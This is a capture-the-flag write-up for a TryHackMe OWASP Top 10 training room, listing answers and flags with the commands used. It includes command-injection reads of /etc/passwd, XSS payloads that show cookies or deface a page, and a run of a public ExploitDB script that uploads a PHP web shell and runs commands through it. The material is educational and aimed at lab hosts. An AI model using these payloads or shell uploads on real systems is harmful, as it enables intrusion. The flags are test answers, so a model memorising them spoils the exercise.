---
layout: post
title: "OWASP Top 10 - Write-up - TryHackMe"
lang: en
categories:
  - writeups
tags:
  - writeups
  - thm
  - linux
  - eop
  - owasp
  - web
  - idor
  - xxe
date: 2020/11/14 23:34:00
thumbnail: /images/TryHackMe/owasp_top_10.png
authorId: noraj
toc: true
---
# Information

## Room

- **Name:** OWASP Top 10
- **Profile:** [tryhackme.com](https://tryhackme.com/room/owasptop10)
- **Difficulty:** Easy
- **Description**: Learn about and exploit each of the OWASP Top 10 vulnerabilities; the 10 most critical web security risks.

![OWASP Top 10](/images/TryHackMe/owasp_top_10.png)

# Write-up

## Overview

Install tools used in this WU on BlackArch Linux:

```
$ sudo pacman -S exploitdb dbeaver python
```

## [Day 1] Command Injection Practical

### #1

> What strange text file is in the website root directory?

Answer: {% spoiler drpepper.txt %}

Issue the `ls` command to list files.

```
css drpepper.txt evilshell.php index.php js
```

### #2

> How many non-root/non-service/non-daemon users are there?

Answer: {% spoiler 0 %}

Issue the `cat /etc/passwd` command, it seems there is no
non-root/non-service/non-daemon users.

```
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
systemd-network:x:100:102:systemd Network Management,,,:/run/systemd/netif:/usr/sbin/nologin
systemd-resolve:x:101:103:systemd Resolver,,,:/run/systemd/resolve:/usr/sbin/nologin
syslog:x:102:106::/home/syslog:/usr/sbin/nologin
messagebus:x:103:107::/nonexistent:/usr/sbin/nologin
_apt:x:104:65534::/nonexistent:/usr/sbin/nologin
lxd:x:105:65534::/var/lib/lxd/:/bin/false
uuidd:x:106:110::/run/uuidd:/usr/sbin/nologin
dnsmasq:x:107:65534:dnsmasq,,,:/var/lib/misc:/usr/sbin/nologin
landscape:x:108:112::/var/lib/landscape:/usr/sbin/nologin
pollinate:x:109:1::/var/cache/pollinate:/bin/false
sshd:x:110:65534::/run/sshd:/usr/sbin/nologin
```

### #3

> What user is this app running as?

Answer: {% spoiler www-data %}

Issue the `id` command.

```
uid=33(www-data) gid=33(www-data) groups=33(www-data)
```

### #4

> What is the user's shell set as?

Answer: {% spoiler `/usr/sbin/nologin` %}

`echo $SHELL` returns nothing, so let's try
`cat /etc/passwd | grep www-data | cut -d ':' -f 7`.

```
/usr/sbin/nologin
```

### #5

> What version of Ubuntu is running?

Answer: {% spoiler 18.04.4 %}

Run `cat /etc/os-release`.

```
VERSION="18.04.4 LTS (Bionic Beaver)"
ID=ubuntu
ID_LIKE=debian
PRETTY_NAME="Ubuntu 18.04.4 LTS"
VERSION_ID="18.04"
HOME_URL="https://www.ubuntu.com/"
SUPPORT_URL="https://help.ubuntu.com/"
BUG_REPORT_URL="https://bugs.launchpad.net/ubuntu/"
PRIVACY_POLICY_URL="https://www.ubuntu.com/legal/terms-and-policies/privacy-policy"
VERSION_CODENAME=bionic
UBUNTU_CODENAME=bionic
```

### #6

> Print out the MOTD. What favorite beverage is shown?

Answer: {% spoiler DR PEPPER %}

```
$ ls -1 /etc/update-motd.d/
10-help-text
50-landscape-sysinfo
50-motd-news
80-esm
80-livepatch
90-updates-available
91-release-upgrade
92-unattended-upgrades
95-hwe-eol
97-overlayroot
98-fsck-at-reboot
98-reboot-required

$ cat /etc/update-motd.d/00-header
#
#    00-header - create the header of the MOTD
#    Copyright (C) 2009-2010 Canonical Ltd.
#
#    Authors: Dustin Kirkland <kirkland@canonical.com>
#
#    This program is free software; you can redistribute it and/or modify
#    it under the terms of the GNU General Public License as published by
#    the Free Software Foundation; either version 2 of the License, or
#    (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU General Public License for more details.
#
#    You should have received a copy of the GNU General Public License along
#    with this program; if not, write to the Free Software Foundation, Inc.,
#    51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.

[ -r /etc/lsb-release ] && . /etc/lsb-release

if [ -z "$DISTRIB_DESCRIPTION" ] && [ -x /usr/bin/lsb_release ]; then
	# Fall back to using the very slow lsb_release utility
	DISTRIB_DESCRIPTION=$(lsb_release -s -d)
fi

printf "Welcome to %s (%s %s %s)\n" "$DISTRIB_DESCRIPTION" "$(uname -o)" "$(uname -r)" "$(uname -m)"

DR PEPPER MAKES THE WORLD TASTE BETTER!
```

## [Day 2] Broken Authentication Practical

### #1

> What is the flag that you found in darren's account?

Register as ` darren` and log in.

Answer: {% spoiler `fe86079416a21a3c99937fea8874b667` %}

### #3

> What is the flag that you found in arthur's account?

Register as ` arthur` and log in.

Answer: {% spoiler `d9ac0f7db4fda460ac3edeb75d75e16e` %}

## [Day 3] Sensitive Data Exposure (Challenge)

### #1

> Have a look around the webapp. The developer has left themselves a note indicating that there is sensitive data in a specific directory.
>
> What is the name of the mentioned directory?

Answer: {% spoiler `/assets` %}

### #2

> Navigate to the directory you found in question one. What file stands out as being likely to contain sensitive data?

Answer: {% spoiler `webapp.db` %}

### #3

> Use the supporting material to access the sensitive data. What is the password hash of the admin user?

Answer: {% spoiler `6eea9b7ef19179a06954edd0f6c05ceb` %}

Open the DB with [dbeaver](https://dbeaver.io/).

### #4

> Crack the hash.
> What is the admin's plaintext password?

Answer: {% spoiler `qwertyuiop` %}

Crack the password with [crackstation](https://crackstation.net/).

### #5

> Login as the admin. What is the flag?

Answer: {% spoiler `THM{Yzc2YjdkMjE5N2VjMzNhOTE3NjdiMjdl}` %}

## [Day 4] XML External Entity - eXtensible Markup Language

### #1

> Full form of XML

Answer: {% spoiler `eXtensible Markup Language` %}

### #2

> Is it compulsory to have XML prolog in XML documents?

Answer: {% spoiler no %}

### #3

> Can we validate XML documents against a schema?

Answer: {% spoiler yes %}

### 4

> How can we specify XML version and encoding in XML document?

Answer: {% spoiler XML Prolog %}

## [Day 4] XML External Entity - DTD

### #1

> How do you define a new ELEMENT?

Answer: {% spoiler `!ELEMENT` %}

### #2

> How do you define a ROOT element?

Answer: {% spoiler `!DOCTYPE` %}

### #3

> How do you define a new ENTITY?

Answer: {% spoiler `!ENTITY` %}

## [Day 4] XML External Entity - Exploiting

### #3

> What is the name of the user in /etc/passwd

Answer: {% spoiler falcon %}

### #4

> Where is falcon's SSH key located?

Answer: {% spoiler `/home/falcon/.ssh/id_rsa` %}

### #5

> What are the first 18 characters for falcon's private key

Answer: {% spoiler `MIIEogIBAAKCAQEA7b` %}

## [Day 5] Broken Access Control (IDOR Challenge)

### #3

> Look at other users notes. What is the flag?

http://10.10.125.211/note.php?note=0

Answer: {% spoiler `flag{fivefourthree}` %}

## [Day 6] Security Misconfiguration

### #2

> Hack into the webapp, and find the flag!

https://github.com/NinjaJc01/PensiveNotes

Answer: {% spoiler `thm{4b9513968fd564a87b28aa1f9d672e17}` %}

## [Day 7] Cross-site Scripting

### #2

> Go to http://10.10.93.135/reflected and craft a reflected XSS payload that will cause a popup saying "Hello".

Answer: {% spoiler `ThereIsMoreToXSSThanYouThink` %}

```html
<script>alert("Hello")</script>
```

### #3

> On the same reflective page, craft a reflected XSS payload that will cause a popup with your machines IP address.

```html
<script>alert(window.location.hostname)</script>
```

Answer: {% spoiler `ReflectiveXss4TheWin` %}

### #4

> Now navigate to http://10.10.93.135/stored and make an account.
>
> Then add a comment and see if you can insert some of your own HTML.

```html
<b>noraj is bold</b>
```

Answer: {% spoiler `HTML_T4gs` %}

### #5

> On the same page, create an alert popup box appear on the page with your document cookies.

```html
<script>alert(document.cookies)</script>
```

Answer: {% spoiler `W3LL_D0N3_LVL2s` %}

### #6

> Change "XSS Playground" to "I am a hacker" by adding a comment and using Javascript.

```html
<script>document.querySelector("#thm-title").textContent = "I am a hacker"</script>
```

Answer: {% spoiler `websites_can_be_easily_defaced_with_xss` %}

## [Day 8] Insecure Deserialization

### #1

> Who developed the Tomcat application?

Answer: {% spoiler `The Apache Software Fundation` %}

### #2

> What type of attack that crashes services can be performed with insecure deserialization?

Answer: {% spoiler `denial of service` %}

## [Day 8] Insecure Deserialization - Objects

### #1

> Select the correct term of the following statement:

Answer: {% spoiler `A Behaviour` %}

## [Day 8] Insecure Deserialization - Deserialization

### #1

> What is the name of the base-2 formatting that data is sent across a network as?

Answer: {% spoiler `binary` %}

## [Day 8] Insecure Deserialization - Cookies

### #1

> If a cookie had the path of webapp.com/login , what would the URL that the user has to visit be?

Answer: {% spoiler `webapp.com/login` %}

### #2

> What is the acronym for the web technology that Secure cookies work over?

Answer: {% spoiler `HTTPS` %}

## [Day 8] Insecure Deserialization - Cookies Practical

### #1

> 1st flag (cookie value)

Answer: {% spoiler `THM{good_old_base64_huh}` %}

```
$ printf %s 'gAN9cQAoWAkAAABzZXNzaW9uSWRxAVggAAAAYzdkYzQ0ODM4ZTA4NDdiMWI0NTU0NDk0OGE5MmQxOTRxAlgLAAAAZW5jb2RlZGZsYWdxA1gYAAAAVEhNe2dvb2Rfb2xkX2Jhc2U2NF9odWh9cQR1Lg==' | base64 -d
}q(X    sessionIdqX c7dc44838e0847b1b45544948a92d194qX
                                                      encodedflagqXTHM{good_old_base64_huh}qu.
```

### #2

> 2nd flag (admin dashboard)

Answer: {% spoiler `THM{heres_the_admin_flag}` %}

## [Day 8] Insecure Deserialization - Remote Code Execution

### #1

> flag.txt

Answer: {% spoiler `4a69a7ff9fd68` %}

## [Day 9] Components With Known Vulnerabilities - Lab

> How many characters are in /etc/passwd (use wc -c /etc/passwd to get the answer)

Answer: {% spoiler 1611 %}

```
$ searchsploit CSE bookstore
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
CSE Bookstore 1.0 - 'quantity' Persistent Cross-site Scripting                      | php/webapps/48973.txt
CSE Bookstore 1.0 - Authentication Bypass                                           | php/webapps/48960.txt
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit online book store
------------------------------------------------------------------------------------ ---------------------------------
 Exploit Title                                                                      |  Path
------------------------------------------------------------------------------------ ---------------------------------
GotoCode Online Bookstore - Multiple Vulnerabilities                                | asp/webapps/17921.txt
Online Book Store 1.0 - 'bookisbn' SQL Injection                                    | php/webapps/47922.txt
Online Book Store 1.0 - 'id' SQL Injection                                          | php/webapps/48775.txt
Online Book Store 1.0 - Arbitrary File Upload                                       | php/webapps/47928.txt
Online Book Store 1.0 - Unauthenticated Remote Code Execution                       | php/webapps/47887.py
------------------------------------------------------------------------------------ ---------------------------------
Shellcodes: No Results

$ searchsploit -p 47887
  Exploit: Online Book Store 1.0 - Unauthenticated Remote Code Execution
      URL: https://www.exploit-db.com/exploits/47887
     Path: /usr/share/exploitdb/exploits/php/webapps/47887.py
File Type: ASCII text, with CRLF line terminators

$ python /usr/share/exploitdb/exploits/php/webapps/47887.py http://10.10.74.65
> Attempting to upload PHP web shell...
> Verifying shell upload...
> Web shell uploaded to http://10.10.74.65/bootstrap/img/P82Exx96Uv.php
> Example command usage: http://10.10.74.65/bootstrap/img/P82Exx96Uv.php?cmd=whoami
> Do you wish to launch a shell here? (y/n): y
RCE $ wc -c /etc/passwd
1611 /etc/passwd
```

## [Day 10] Insufficient Logging and Monitoring

> What IP address is the attacker using?

Answer: {% spoiler `49.99.13.16` %}

> What kind of attack is being carried out?

Answer: {% spoiler `brute force` %}
